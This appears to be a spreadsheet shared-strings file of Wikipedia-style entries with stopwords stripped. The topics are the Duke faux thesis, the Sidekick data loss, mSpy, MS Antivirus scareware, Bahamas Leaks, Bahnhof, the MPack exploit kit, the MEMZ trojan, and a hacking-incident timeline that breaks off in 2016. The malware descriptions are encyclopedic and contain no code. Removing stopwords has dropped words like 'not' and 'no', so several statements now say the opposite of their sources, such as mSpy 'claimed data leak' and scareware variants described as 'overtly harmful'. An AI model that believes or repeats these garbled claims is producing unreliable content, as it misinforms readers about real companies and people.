spam messages day, 4.3% global spam volume. also references</t>
  </si>
  <si>
    <t>2010 Duke University faux sex thesis controversy</t>
  </si>
  <si>
    <t>2010 duke university faux thesis controversy arose private 42-page powerpoint document written duke university senior, karen owen, format thesis sexual experiences time attending university. controversy shortly graduating duke university 2010, karen owen wrote thesis styled document sexual experiences time attending university. privately distributed document three friends. mid-september 2010, homecoming weekend, friends decided forward onward, document went viral. faux thesis, titled education beyond classroom: excelling realm horizontal academics", owen ranked partners based criteria performance. bulk controversy surrounded whether invaded partners' rights privacy, whether subjects owen's faux thesis right sue, done case jessica cutler cutler published details life blog. also raised questions whether double standards exist reaction would faux thesis written male. faux dissertation attracted additional attention owen ranked lacrosse team, unrelated controversy surrounding team years prior. reaction about month faux thesis made headlines, duke university history department held forum long term implications faux thesis. months that, atlantic published article discussing incident context duke's culture well binge drinking women. author background karen owen, author faux thesis, grew branford, connecticut graduated branford high school 2006. scholarship attend duke avid sports time there. following controversy after faux dissertation went viral, owen deleted, closed down, blocked access social networking sites. stated "that fraternities 'make lists like time.'" also expressed deep regret incident, saying would "never intentionally hurt people [were] mentioned faux thesis]." popular culture december 2010, order: special victims unit aired episode called "rescue", based story karen owen's faux thesis. feature film escort features prostitute similar back story, making impossible real job. references external links redacted version karen owen's document jezebel.com</t>
  </si>
  <si>
    <t>2009 Sidekick data loss</t>
  </si>
  <si>
    <t>sidekick data outage 2009 resulted estimated 800,000 smartphone users united states temporarily losing personal data, emails, address books photos mobile handsets. computer servers holding data microsoft. brand phone affected danger hiptop, also known "sidekick", connected t-mobile cellular network. time, described biggest disaster cloud computing history. sidekick smartphones originally produced danger, inc., company bought microsoft february 2007. after acquisition, former danger staff absorbed mobile communications business (mcb) entertainment devices division microsoft, worked future microsoft mobile phone platform known project pink. however, ex-danger employees soon left microsoft pursue things. microsoft took running data servers, data centers hosting customers' data time lost.on friday, october 2009, t-mobile sidekick phone users started noticing data service outages occurring. outages lasted approximately weeks, october 2009, t-mobile announced personal information stored sidekick phones would permanently lost, turned incorrect.according financial times, microsoft said data center acquired danger months previously "updated microsoft technology." company statement said mishap confluence errors server failure hurt main backup databases supporting sidekick users." t-mobile blamed microsoft loss data.the incident caused public loss confidence concept cloud computing, plagued series outages data losses 2009. also problematic microsoft, time trying convince corporate clients cloud computing services, azure phone.on october 2009, class action lawsuit launched microsoft t-mobile. lawsuit alleged: t-mobile microsoft promised safeguard important data customers possess apparently failed follow even basic data protection principles. what unthinkable age. class action lawsuit settled 2011, affected users compensated "$35 t-mobile gift card, $17.50 check payment, free downloadable items."on october microsoft said able recover data would begin restore them.microsoft ceo, steve ballmer disputed whether data loss all, instead describing outage. ballmer said, clear data loss". however, said incident "not good" microsoft.even data loss, danger marketed application windows computers would back sidekick data onto user's computer also allow changes made re-downloaded sidekick real-time. users backup storage option able save data. united states, t-mobile marketed application one-time charge $10. immediately data restored users, t-mobile incorporated sidekick storage website regular t-mobile backup site. application user's personal computer, danger backup site, t-mobile backup site could synchronized together. references</t>
  </si>
  <si>
    <t>MSpy</t>
  </si>
  <si>
    <t>mspy brand mobile computer parental control monitoring software ios, android, windows, macos. allows users monitor activity client device. history mspy launched product mobile monitoring 2010 london-based tech company.in 2012, application allowed parents monitor smartphones also computers windows mac. 2014, business grew nearly 400%, app's user numbers exceeded million mark.in 2016, mlite, light version mspy, became available google play. 2015 2018, mspy victim data breaches released user data. reception noted since mspy runs inconspicuously, risk software used illegally. mspy called "terrifying" next featured coverage spyware used victims stalking domestic violence.in 2015, brian krebs claimed mspy hacked, leaking personal data hundreds thousands users devices mspy installed. mspy claimed data leak, instead, victim blackmailers.in september 2018, brian krebs claimed demonstrated anyone could easily gain access mspy database containing data millions users. also parental controls spyware references links official website</t>
  </si>
  <si>
    <t>MS Antivirus (malware)</t>
  </si>
  <si>
    <t>antivirus (also known spyware protect 2009 antivirus 2008/antivirus2009/securitytool/etc) scareware rogue anti-virus purports remove virus infections found computer running microsoft windows. attempts scam user purchasing "full version" software. company individuals behind bakasoftware operated different 'company' names, including innovagest2000, innovative marketing ukraine, pandora software, locussoftware, etc. names many clones antivirus include slight variations distributed throughout web. they known antivirus, vitae antivirus, windows antivirus, antivirus, antivirus action, antivirus 2009, 2010, 2017 simply antivirus pro, antivirus 2007, 2008, 2009, 2010, 2011, 360, antimalware internet antivirus plus, system antivirus, spyware guard 2008 2009, spyware protect 2009, winweb security 2008, antivirus total antivirus 2020, live protection suite, system security, malware defender 2009, ultimate antivirus2008, vista antivirus, general antivirus, antispywaremaster, antispyware 2008, antispyware 2008, 2009 2010, antivirus vista 2010, real antivirus, winpcdefender, antivirus pro, anti-virus-1, antivirus soft, vista antispyware 2012, antispyware soft, antivirus system pro, antivirus live, vista anti malware 2010, internet security 2010, antivirus pro, security tool, vscan7, total security, defender plus, disk antivirus professional, avasoft professional antivirus, system care antivirus, system doctor 2014. another antivirus clone named antivirus. this name used confuse user software thinking legitimate antivirus downloading symptoms infection each variant downloading installing onto computer. antivirus made look functional fool computer user thinking real anti-virus system order convince user "purchase" typical installation, antivirus runs scan computer gives false spyware report claiming computer infected spyware. once scan completed, warning message appears lists spyware ‘found’ user either click link button remove regardless button clicked "next" "cancel"—a download still this deceptive tactic attempt scare internet user clicking link button purchase antivirus. user decides purchase program, constantly receive pop-ups stating program found infections register order them. this type behavior cause computer operate slowly normal. antivirus also occasionally display fake pop-up alerts infected computer. these alerts pretend detection attack computer alert prompts user activate purchase software order stop attack. more seriously paste fake picture blue screen death screen display fake startup image telling user software. malware also block certain windows programs allow user modify remove programs regedit blocked malware. registry also modified software runs system startup. following files downloaded infected computer: msasetup.exe msa.exe msa.cpl msx.exedepending variant, files different names therefore appear labeled differently. example, antivirus 2009 .exe file name a2009.exe.in addition, attempt make software seem legitimate, antivirus give computer symptoms "viruses" claims computer. example, shortcuts desktop changed links sexually explicit websites instead. malicious actions most variants malware overtly harmful, usually steal user's information spyware) critically harm system. however, software inconvenience user frequently displaying popups prompt user register software order remove non-existent viruses. some variants harmful; display popups whenever user tries start application even tries navigate hard drive, especially computer restarted. modifying windows registry. this clog screen repeated pop-ups, potentially making computer virtually unusable. also disable real antivirus programs protect removal. whichever variant infects computer, antivirus always uses system resources running, potentially making infected computer slowly before. malware also block access known spyware removal sites instances, searching "antivirus 2009" similar search terms) search engine result blank page error page. some variants also redirect user actual google search page false google search page link virus' page states user virus antivirus 2009. rare cases, newest version malware, prevent user performing system restore. earnings november 2008, reported hacker known neon hacked bakasoftware's database, posted earnings company received antivirus. data revealed successful affiliate earned usd$158,000 week. court actions december 2008, u.s. district court district maryland issued temporary restraining order innovative marketing, inc. bytehosting internet services, receiving request federal trade commission (ftc). according ftc, combined malware winfixer, winantivirus, drivecleaner, errorsafe, antivirus fooled million people purchasing software marketed security products. court also froze assets companies effort provide monetary reimbursement affected victims. claims companies established elaborate ruse duped internet advertising networks popular sites carrying advertisements. according complaint, companies charged case operated using variety aliases maintained offices countries belize ukraine (kiev). bytehosting internet services based cincinnati, ohio. complaint also names defendants daniel sundin, jain, marc d’souza, kristy ross, james reno filing, along maurice d’souza, named relief defendant, receiving proceeds scheme. also rogue software malware references external links antivirus 2009 description removal instructions about.com</t>
  </si>
  <si>
    <t>Bahamas Leaks</t>
  </si>
  <si>
    <t>bahama leaks million internal files company register bahamas. after release panama papers 2016, unknown source handed internal data national corporate registry bahamas frederik obermaier bastian obermayer, analyzed help international consortium investigative journalists (icij). time, icij, süddeutsche zeitung media partners published detailed reporting published online database offshore entities.the files provided data 175,888 shell companies trusts established bahamas 1990 2016. gigabytes data showed "several current former heads state government high-ranking politicians, including former commissioner neelie kroes; colombia’s former mining minister carlos caballero argáez; hamad jassim jaber thani, former prime minister qatar; angola’s vice-president, manuel domingos vicente respectively directors, secretaries, presidents bahamian companies".the files later published part larger distributed denial secrets. bahamas attorney general accused group hacking corporate registry, though disputed group, icij frederik obermaier. offshore leaks database combined documents panama papers others leaked offshore documents, first time free, online publicly-searchable database offshore companies made available public. offshore leaks database contains information 500,000 entities linked countries territories. also distributed denial secrets international consortium investigative journalists offshore leaks panama papers paradise papers references</t>
  </si>
  <si>
    <t>Bahnhof</t>
  </si>
  <si>
    <t>bahnhof (german "railway station") swedish internet service provider (isp) founded 1994 oscar swartz uppsala, sweden, country's first independent isp. today company represented stockholm, gothenburg, uppsala, borlänge, malmö umeå. wikileaks used hosted bahnhof data center inside ultra-secure bunker pionen, buried inside white mountains stockholm. history bahnhof founded 1994 oscar swartz. sweden's first isps. company publicly traded since december 2007 name bahn-b (aktietorget). september 2008, bahnhof opened computer center inside former civil defence center pionen white mountains stockholm, sweden. controversies march 2005, swedish police confiscated four servers placed bahnhof premises, hoping find copyrighted material. although servers located near bahnhof's server park network area) company claimed property since privately purchased staff. they presented evidence showing material servers planted someone hired svenska antipiratbyrån, swedish anti-copyright infringement organisation.in 2009, bahnhof generated controversy failing store addresses customers, order defeat swedish government's laws illegal file-sharing, transposing ipred regulations, enabled isps retain data longer data protection regulations would allow, order available police request.after whistleblowing website wikileaks kicked amazon services december 2010, bought server space bahnhof, chairman karlung revealed press interviews light controversy created leaks afghanistan, even showing journalists servers data held. chairman said wikileaks treated like bahnhof's clients.in april 2014, cjeu struck data retention directive. pts, sweden's telecommunications regulator, told swedish isps telcos would longer retain call records internet metadata. however, government investigations found sweden's data retention break obligations european convention human rights, reversed course. most sweden's major telecommunications companies complied immediately, though tele2 lodged unsuccessful appeal. bahnhof holdout given order comply november deadline face five million kronor ($680,000) fine. response bahnhof offered customers free service.in october 2018, elsevier secured court order required swedish isps block access sci-hub websites. while complying order, bahnhof also soft-blocked access elsevier website. references external links data center tour presented karlung youtube official website english) official website swedish) pictures pionen architecture news plus</t>
  </si>
  <si>
    <t>MPack (software)</t>
  </si>
  <si>
    <t>computer security, mpack php-based malware produced russian crackers. first version released december 2006. since version thought released roughly every month. thought used infect 160,000 keylogging software. august 2007 believed used attack site bank india originated russian business network. unusual kits, mpack sold commercial software (costing $500 $1,000 us), provided developers technical support regular updates software vulnerabilities exploits. modules sold developers containing exploits. these cost $150 depending severe exploit developers also charge make scripts executables undetectable antivirus software. server-side software able customize attacks variety browsers including microsoft internet explorer, mozilla firefox opera. mpack generally works loaded iframe attached bottom defaced website. when user visits page, mpack sends script loads iframe determines vulnerabilities browser operating system exploited. finds any, exploit store various statistics future reference. included server management console, allows attacker deploying software view statistics computers infected, including browsers using countries connections originated from. also exploit exploit trojan horse (computing) spyware botnet computer virus backdoor (computing) references "hackers target 'legitimate' sites". bbc. 2007-06-20. retrieved 2007-06-26. "mpack, packed full badness". symantec. 2007-05-27. retrieved 2007-06-26. "pandalabs report: mpack uncovered" (pdf). pandalabs. 2007-05-11. retrieved 2007-07-04. "mpack malware exposes cheapskate hosts". register. 2007-07-04. retrieved 2007-07-04. "interview mpack developer". register. 2007-07-23. retrieved 2007-07-23. brian krebs (2007-10-13). "mapping russian business network". washington post blogs. retrieved 2007-10-14. gregg keizer (2007-09-30). "bank india site hacked, serves exploits". computer world. archived original 2007-10-14. retrieved 2007-10-14.</t>
  </si>
  <si>
    <t>MP3Concept</t>
  </si>
  <si>
    <t>mp3concept first trojan horse created around april 2004. mp3concept benign, designed proof concept regarding file disguised user environment application bundle looks like file. when launched, plays clip laughing. since creation apple added additional verifications finder prevent attack. antivirus software also looks characteristics well. external links symantec profile downloadcheck simple utility iconfactory verify files files, applications</t>
  </si>
  <si>
    <t>List of pop-up blocking software</t>
  </si>
  <si>
    <t>this list software blocks pop-up ads. browsers block pop-up trident shells explorer avant browser greenbrowser internet explorer lunascape maxthon explorer neoplanet netcaptor netscape sleipnirgecko-based browsers camino epiphany flock galeon k-meleon lunascape mozilla application suite mozilla firefox netscape netscape seamonkeykhtml/webkit-based browsers brave google chrome icab konqueror lunascape omniweb safari shiirapresto-based browsers operaothers links netsurf add-on programs block pop-up privoxy proxomitron browser extensions adblock plus adblock adguard alexa toolbar bing google toolbar ghostery ie7pro imacros noscript—open source (gpl) ublock origin yahoo! toolbar references</t>
  </si>
  <si>
    <t>MEMZ</t>
  </si>
  <si>
    <t>memz trojan malware form trojan horse made microsoft windows. origin memz originally created leurak youtuber danooct1's viewer-made malware series. later featured joel johansson, alias vargskelethor, member live-streaming group vinesauce series windows destruction, demonstrated trojan action windows virtual machine provided copy danooct1. actions virus gained notoriety unique complex payloads, automatically activate other, delay. examples payloads include randomly moving cursor slightly, opening satirical google searches google.co.ck "how remove virus" "how money" user's browser, opening various random microsoft windows programs (such calculator command prompt). true program's name, many parts virus based internet memes; example, virus overwrites boot sector animation nyan cat. leurak also created safer version memz called memz-clean. clean version allows non-destructive payloads safely tested gives user full control payloads active. vinememz variant variant memz, dubbed "vinememz", coded leurak gift johansson livestream featuring original memz gained significant traction. this version memz similar original, features many references vinesauce, especially johansson's game streams, bootleg game grand adware program bonzibuddy. this variant also released public. references external links memz trojan demonstration youtube guide removing memz youtube</t>
  </si>
  <si>
    <t>List of security hacking incidents</t>
  </si>
  <si>
    <t xml:space="preserve">list security hacking incidents covers important noteworthy events history security hacking cracking. 1900 1903 magician inventor nevil maskelyne disrupts john ambrose fleming's public demonstration guglielmo marconi's purportedly secure wireless telegraphy technology, sending insulting morse code messages auditorium's projector. 1930s 1932 polish cryptologists marian rejewski, henryk zygalski jerzy różycki broke enigma machine code. 1939 alan turing, gordon welchman harold keen worked together develop bombe basis rejewski's works bomba). enigma machine's reliably small space makes vulnerable brute force. 1940s 1943 rené carmille, comptroller general vichy french army, hacked punched card system used nazis locate jews. 1949 theory underlies computer viruses first made public 1949, computer pioneer john neumann presented paper titled "theory organization complicated automata". paper neumann speculated computer programs could reproduce themselves. 1950s 1955 mit, "hack" first came mean fussing machines. minutes april 1955 meeting tech model railroad club state "mr. eccles requests anyone working hacking electrical system turn power avoid fuse blowing." 1957 "joybubbles" engressia, blind seven-year-old perfect pitch, discovered whistling fourth middle frequency 2600 would interfere at&amp;t's automated telephone systems, thereby inadvertently opening door phreaking. 1960s various phreaking boxes used interact automated telephone systems. 1963 first ever reference malicious hacking 'telephone hackers' mit's student newspaper, tech hackers tying lines harvard, configuring pdp-1 make free calls, dialing accumulating large phone bills. 1965 william mathews found vulnerability ctss running 7094. standard text editor system designed used user time, working directory, created temporary file constant name instantiations editor. flaw discovered system programmers editing time temporary files message-of-the password file became swapped, causing contents system ctss password file display user logging system. 1967 first known incidence network penetration hacking took place members computer club suburban chicago area high school provided access ibm's network. fall 1967, (through science research associates) approached evanston township high school offer four 2741 selectric teletypewriter based terminals dial-up modem connectivity experimental computer system implemented early version programming language. network system structured workspaces assigned various clients using system. working independently, students quickly learned language system. they free explore system, often using existing code available public workspaces models creations. eventually, curiosity drove students explore system's wider context. this first informal network penetration effort later acknowledged helping harden security first publicly accessible networks:science research associates undertook write full system 1500. they modeled system apl/360, time developed seen substantial inside ibm, using code borrowed mat/1500 possible. documentation acknowledge gratitude number high school students compulsion bomb system". this early example kind sportive, effective, debugging often repeated evolution systems. 1970s 1971 john draper (later nicknamed captain crunch), friend engressia (also known joybubbles), blue phone phreaking news esquire magazine feature story. 1979 kevin mitnick breaks first major computer system, ark, computer system digital equipment corporation (dec) used developing rsts/e operating system software. 1980s 1980 investigates breach security national (ncss). york times, reporting incident 1981, describes hackers astechnical experts; skilled, often young, computer programmers, almost whimsically probe defenses computer system, searching limits possibilities machine. despite seemingly subversive role, hackers recognized asset computer industry, often highly prizedthe newspaper describes white activities part "mischievous perversely positive 'hacker' tradition". when national employee revealed existence password cracker, used customer accounts, company chastised writing software disclosing sooner. letter reprimand stated "the company realizes benefit ncss fact encourages efforts employees identify security weaknesses directory, sensitive software files". 1981 chaos computer club forms germany. murphy captain zap, first cracker tried convicted felon. murphy broke at&amp;t's computers 1981 changed internal clocks metered billing rates. people getting late-night discount rates called midday. course, bargain-seekers waited midnight call long distance high bills. 1983 414s break computer systems institutions ranging alamos national laboratory manhattan's memorial sloan-kettering cancer center. incident appeared cover story newsweek title "beware: hackers play". result, u.s. house representatives held hearings computer security passed several laws. group kilobaud formed february, kicking series hacker groups form soon after. movie wargames introduces wider public phenomenon hacking creates degree mass paranoia hackers supposed abilities bring world screeching halt launching nuclear icbms. u.s. house representatives begins hearings computer security hacking. turing award lecture, thompson mentions "hacking" describes security exploit calls "trojan horse". 1984 someone calling luthor founds legion doom. named saturday morning cartoon, reputation attracting "the best best"—until talented members called phiber optik feuded legion doomer erik bloodaxe 'tossed clubhouse'. phiber's friends formed rival group, masters deception. comprehensive crime control gives secret service jurisdiction computer fraud. cult dead forms lubbock, texas, begins publishing ezine. hacker magazine 2600 begins regular publication, right putting final issue. editor 2600, "emmanuel goldstein" (whose real name eric corley), takes handle leader resistance george orwell's 1984. publication provides tips would-be hackers phone phreaks, well commentary hacker issues day. today, copies 2600 sold large retail bookstores. chaos communication congress, annual european hacker conference organized chaos computer club, held hamburg, germany. william gibson's groundbreaking science fiction novel neuromancer, "case", futuristic computer hacker, published. considered first major cyberpunk novel, brought hacker jargon terms "cyberspace", "the matrix", "simstim", "ice". 1985 kilobaud re-organized p.h.i.r.m. begins sysopping hundreds bbss throughout united states, canada, europe. online 'zine phrack established. hacker's handbook published fbi, secret service, middlesex county prosecutor's office various local enforcement agencies execute seven search warrants concurrently across jersey july 1985, seizing equipment operators users alike "complicity computer theft", newly passed, untested criminal statute. this famously known private sector bust, 2600 seizure, implicated private sector sysop, store manager (also sysop), beowulf, barchetta, vampire, hack shack sysop, treasure chest sysop. 1986 after break-ins government corporate computers, congress passes computer fraud abuse act, makes crime break computer systems. law, however, cover juveniles. robert schifreen stephen gold convicted accessing telecom gold account belonging duke edinburgh forgery counterfeiting 1981 united kingdom, first conviction illegally accessing computer system. appeal, conviction overturned hacking within legal definition forgery. arrest hacker calls mentor. published now-famous treatise shortly arrest came known hacker manifesto e-zine phrack. this still serves famous piece hacker literature frequently used illustrate mindset hackers. astronomer clifford stoll plays pivotal role tracking hacker markus hess, events later covered stoll's 1990 book cuckoo's egg. 1987 christmas tree exec "worm" causes major disruption vnet, bitnet earn networks. 1988 morris worm. graduate student robert morris, cornell university launches worm government's arpanet (precursor internet). worm spreads 6,000 networked computers, clogging government university systems. robert morris dismissed cornell, sentenced three years' probation, fined $10,000. first national bank chicago victim million computer theft. computer emergency response team (cert) created darpa address network security. father christmas (computer worm) spreads decnet networks. 1989 jude milhon (aka jude) sirius launch mondo 2000, major '90s tech-lifestyle magazine, berkeley, california. politically motivated wank worm spreads decnet. dutch magazine hack-tic begins. cuckoo's clifford stoll published. detection aids (trojan horse) first instance ransomware detection. 1990s 1990 operation sundevil introduced. after prolonged sting investigation, secret service agents swoop organizers prominent members bbss u.s. cities including legion doom, conducting early-morning raids arrests. arrests involve aimed cracking credit-card theft telephone wire fraud. result breakdown hacking community, members informing exchange immunity. offices steve jackson games also raided, role-playing sourcebook gurps cyberpunk confiscated, possibly government fears "handbook computer crime". legal battles arise prompt formation electronic frontier foundation, including trial knight lightning. australian federal police tracking realm members phoenix, electron first world remote data intercept gain evidence computer crime prosecution. computer misuse 1990 passed united kingdom, criminalising unauthorised access computer systems. 1992 release movie sneakers, security experts blackmailed stealing universal decoder encryption systems. first isps, mindvox, opens public. bulgarian virus writer dark avenger wrote 1260, first known polymorphic code, used circumvent type pattern recognition used antivirus software, nowadays also intrusion detection systems. publication hacking instruction manual penetrating credit reporting agency infinite possibilities society (ips) gets ripco, sysop ripco mentioned manual, arrested united states secret service. 1993 first hacking conference takes place vegas. conference meant one-time party good-bye bbss (now replaced web), gathering popular became annual event. gives users access usenet, precipitating eternal september. 1994 summer: russian crackers siphon million citibank transfer money bank accounts around world. vladimir levin, 30-year-old ringleader, used work laptop hours transfer funds accounts finland israel. levin stands trial united states sentenced three years prison. authorities recover $400,000 stolen money. hackers adapt emergence world wide quickly, moving how-to information hacking programs bbss hacker sites. aohell released, freeware application allows burgeoning community unskilled script kiddies wreak havoc america online. days, hundreds thousands users find mailboxes flooded multi-megabyte email bombs chat rooms disrupted spam messages. december after experiencing spoofing attack kevin mitnick, computer security expert tsutomu shimomura started receive prank calls popularized phrase kung stronger yours". 1995 movies hackers released. canadian dlcwest.com hacked website replaced graphic caption "you've hacked mofo" february raids "phone masters". 1996 hackers alter sites united states department justice (august), (october), u.s. force (december). canadian hacker group, brotherhood, breaks canadian broadcasting corporation. arizona hacker, john sabo a.k.a fizzleb/peanut, arrested hacking canadian dlcwest.com claiming company defrauding customers billing. general accounting office reports hackers attempted break defense department computer files 250,000 times 1995 alone success rate doubling annually. cryptovirology born invention cryptoviral extortion protocol would later form basis modern ransomware. 1997 16-year-old croatian youth penetrates computers u.s. force base guam. june: eligible receiver tests american government's readiness cyberattacks. december: information security publishes first issue. first high-profile attacks microsoft's windows operating system 1998 january: yahoo! notifies internet users anyone visiting site past month might downloaded logic bomb worm planted hackers claiming "logic bomb" computer hacker kevin mitnick released prison. february: internet software consortium proposes dnssec (domain name system security extensions) secure servers. seven members hacker think tank known l0pht testify front congressional government affairs committee "weak computer security government". june: information security publishes first annual industry survey, finding nearly three-quarters organizations suffered security incident previous year. september: electronic disturbance theater, online political performance-art group, attacks websites pentagon, mexican president ernesto zedillo, frankfurt stock exchange, calling conceptual claiming protest suppression zapatista army national liberation southern mexico. uses floodnet software bombard opponents access requests. october: "u.s. attorney general janet reno announces national infrastructure protection center." 1999 software security goes mainstream wake microsoft's windows release, 1999 becomes banner year security (and hacking). hundreds advisories patches released response newfound (and widely publicized) bugs windows commercial software products. host security software vendors release anti-hacking products home computers. u.s. president bill clinton announces $1.46 billion initiative improve government computer security. plan would establish network intrusion detection monitors certain federal agencies encourage private sector same. january "legion underground" (lou) declares "war" governments iraq people's republic china. international coalition hackers (including cult dead cow, 2600's staff, phrack's staff, l0pht, chaos computer club) issued joint statement (crd 990107 hackers planet earth infowar) condemning lou's declaration war. responded withdrawing declaration. march: melissa worm released quickly becomes costly malware outbreak date. july: cult dead releases back orifice 2000 con. august: kevin mitnick, sentenced years, years already spent pre-trial including months' solitary confinement. september: level seven crew hacks u.s. embassy china's website places racist, anti-government slogans embassy site regards 1998 u.s. embassy bombings. september united states department justice sentences "phone masters". october: american express introduces "blue" smart card, industry's first chip-based credit card november hacker interviewed hilly rose radio show coast coast (then hosted bell) exposes plot al-qaeda derail amtrak trains. this results trains forcibly stopped safety measure. 2000s 2000 may: iloveyou worm, also known vbs/loveletter love worm, computer worm written vbscript. infected millions computers worldwide within hours release. considered damaging worms ever. originated philippines; made computer college student onel guzman thesis. september: computer hacker jonathan james became first juvenile serve jail time hacking. 2001 microsoft becomes prominent victim type hack attacks domain name server. denial-of-service attacks, paths take users microsoft's websites corrupted. february: dutch cracker releases anna kournikova virus, initiating wave viruses tempts users open infected attachment promising sexy picture russian tennis star. april: agents trick russian crackers coming u.s. revealing hacking u.s. banks. july: russian programmer dmitry sklyarov arrested annual hacker convention. first person criminally charged violating digital millennium copyright (dmca). august: code worm, infects tens thousands machines. national cyber security alliance (ncsa) established response september attacks world trade center. 2002 january: bill gates decrees microsoft secure products services, kicks massive internal training quality control campaign. march: gary mckinnon arrested following unauthorized access military nasa computers. may: klez.h, variant worm discovered november 2001, becomes biggest malware outbreak terms machines infected, causes little monetary damage. june: bush administration files bill create department homeland security, which, among things, responsible protecting nation's critical infrastructure. august: researcher chris paget publishes paper describing "shatter attacks", detailing windows' unauthenticated messaging system used take machine. paper raises questions securable windows could ever however largely derided irrelevant vulnerabilities described caused vulnerable applications (placing windows desktop inappropriate privileges) rather inherent flaw within operating system. october: international information systems security certification consortium—(isc)²—confers 10,000th cissp certification. 2003 hacktivist group anonymous formed. march: cult dead hacktivismo given permission united states department commerce export software utilizing strong encryption. 2004 march: zealand's government (national party) website defaced hacktivist group blackmask july: north korea claims trained hackers successfully crack south korean, japanese, allies' computer systems. october: national cyber security awareness month launched national cyber security alliance u.s. department homeland security. 2005 april rafael núñez (aka rafa), notorious member hacking group world hell, arrested following arrival miami international airport breaking defense information systems agency computer system june 2001. september cameron lacroix sentenced months gaining access t-mobile's network exploiting paris hilton's sidekick. november jeanson james ancheta, prosecutors member "botmaster underground", group script kiddies mostly noted excessive attacks propagating vast amounts spam, taken custody lured offices angeles. 2006 january: worms take form malware, destruction data rather accumulation zombie networks launch attacks from, discovered. various names, including kama sutra (used media reports), black worm, mywife, blackmal, nyxem version kapser, killav, grew cme-24. worm would spread e-mail client address books, would search documents fill garbage, instead deleting confuse user. would also page counter took control, allowing programmer created well world track progress worm. would replace documents random garbage third every month. hyped media actually affected relatively computers, real threat users. may: jeanson james ancheta receives 57-month prison sentence, ordered damages amounting $15,000 naval warfare center china lake defense information systems agency, damage done ddos attacks hacking. ancheta also forfeit gains government, include $60,000 cash, bmw, computer equipment. may: largest defacement history time performed turkish hacker iskorpitx successfully hacked 21,549 websites shot. july: robert moore edwin pena first people charged u.s. authorities voip hacking. robert moore served years federal prison given $152,000 restitution. once edwin pena caught fleeing country, evading authorities almost years, sentenced years given million restitution. september: viodentia releases fairuse4wm tool would remove information windows media audio (wma) files downloaded music services yahoo! unlimited, napster, rhapsody music urge. 2007 estonia recovers massive denial-of-service attack june operation roast finds million botnet victims june spear phishing incident office secretary defense steals sensitive u.s. defense information, leading significant changes identity message-source verification osd.august united nations website hacked indian hacker pankaj kumar singh. november panda burning incense known several names, including fujacks radoppan.t lead arrest eight people china. panda burning incense parasitic virus infected executable files when infected, icon executable file changes image panda holding three sticks incense. arrests first virus writing china. 2008 january project chanology; anonymous attacks scientology website servers around world. private documents stolen scientology computers distributed internet. march around chinese hackers claim gained access world's sensitive sites, including pentagon. they operated apartment chinese island. march trend micro website successfully hacked turkish hacker janizary (aka utku). 2009 april conficker worm infiltrated millions worldwide including many government-level top-security computer networks. 2010s 2010 january operation aurora google publicly reveals receiving "highly sophisticated targeted attack corporate infrastructure originating china resulted theft intellectual property google" june: stuxnet stuxnet worm found virusblokada. stuxnet unusual spread windows computers, payload targeted specific model type scada systems. slowly became clear cyber attack iran's nuclear facilities—with experts believing israel behind it—perhaps help. december first malware conference, malcon took place india. founded rajshekhar murthy, malware coders invited showcase skills annual event supported government india. advanced malware symbian released hacker a0drul3z. 2011 hacker group lulz security formed. april bank america website hacked turkish hacker named jeopardy. estimated 85,000 credit card numbers accounts reported stolen hack. bank officials personal customer bank information available web-page. investigations conducted trace incriminated hacker. april "external intrusion" sends playstation network offline, compromises personally identifying information (possibly including credit card details) million accounts, claimed five largest data breaches ever. computer hacker sl1nk releases information penetration servers department defense (dod), pentagon, nasa, nsa, military, department navy, space naval warfare system command uk/us government websites. september: bangladeshi hacker tiger-m@te made world record defacement history hacking 700,000 websites single shot. october youtube channel sesame street hacked, streaming pornographic content minutes. november main phone internet networks palestinian territories sustained hacker attack multiple locations worldwide. november forums valve's steam service hacked. redirects hacking website, fkn0wned, appeared steam users' forums, offering "hacking tutorials tools, porn, free giveaways much more." december five members norwegian hacker group, noria, arrested, allegedly suspected hacking email account militant extremist anders behring breivik (who perpetrated 2011 attacks country). 2012 hacker, big-smoke, published 400,000 credit cards online, threatened israel release million credit cards future. response incident, israeli hacker published albanian' credit cards online. gottfrid svartholm warg, co-founder pirate bay, convicted denmark hacking mainframe computer, denmark's biggest hacking case. january "team appunity", group norwegian hackers, arrested breaking norway's largest prostitution website publishing user database online. february marriott hacked ideologist, attila nemeth resisting world order said corporations allegedly controlling world. response marriott reported united states secret service. february foxconn hacked hacker group, "swagg security", releasing massive amount data including email server logins, even alarming—bank account credentials large companies like apple microsoft. swagg security stages attack foxconn protest ignites terrible working conditions southern china. websites several turkish representative offices international it-companies defaced within f0rtys3v3n (turkish hacker), including websites google, yandex, microsoft, gmail, msn, hotmail, paypal. whmcs hacked ugnazi, claim reason illegal sites using software. mybb hacked newly founded hacker group, ugnazi, website defaced day, claim reasoning upset forum board hackforums.net uses software. june social networking website linkedin hacked passwords nearly million user accounts stolen cybercriminals. result, united states grand jury indicted nikulin three unnamed co-conspirators charges aggravated identity theft computer intrusion. august valuable company world saudi aramco crippled cyber warfare attack months malware called shamoon. considered biggest hack history terms cost destructiveness carried iranian attacker group called cutting sword justice. iranian hackers retaliated stuxnet releasing shamoon. malware destroyed 35,000 saudi aramco computers, affecting business operations months. december computer hacker sl1nk announced hacked total countries' scada systems. proof includes countries: france, norway, russia, spain, sweden united states. 2013 social networking website tumblr attacked hackers. consequently, 65,469,298 unique emails passwords leaked tumblr. data breach's legitimacy confirmed computer security researcher troy hunt. august: yahoo! data breaches occurred. more billion users data leaked. 2014 february bitcoin exchange filed bankruptcy $460 million apparently stolen hackers "weaknesses [their] system" another $27.4 million went missing bank accounts. october: white house computer system hacked. said fbi, secret service, u.s. intelligence agencies categorized attacks "among sophisticated attacks ever launched u.s. government systems." november response release film interview, servers sony pictures hacked hacker group calling "guardian peace". november website philippine telecommunications company globe telecom hacked response poor internet service distributing. 2015 june: records 21.5 million people, including social security numbers, dates birth, addresses, fingerprints, security clearance-related information, stolen united states office personnel management (opm). most victims employees united states government unsuccessful applicants wall street journal washington post report government sources believe hacker government china. july: servers extramarital affairs website ashley madison breached. 2016 february: 2016 bangladesh bank heist attempted steal us$951 million bangladesh bank, succeeded getting $101 million—although later recovered. march: vice reported teenage hacker cyber anakin gone hacking spree russian websites e-mail provider km.ru game company nival express anger russia downing malaysia airlines flight mh17 eastern ukraine. according cybersecurity researcher troy hunt, least million victims affected breaches. many years later latvia-based independent news website meduza used content km.ru's data breach pinpoint identity person harassing female chess players various countries russia, kazakhstan india delivery mails containing used condoms. july wikileaks published documents 2016 democratic national committee email leak. july group suspected coming china launched hacker attacks website vietnam airlines. august shadow brokers (tsb) started publishing several leaks containing hacking tools national security agency (nsa), including several zero-day exploits. ongoing leaks april 2017 (the shadow 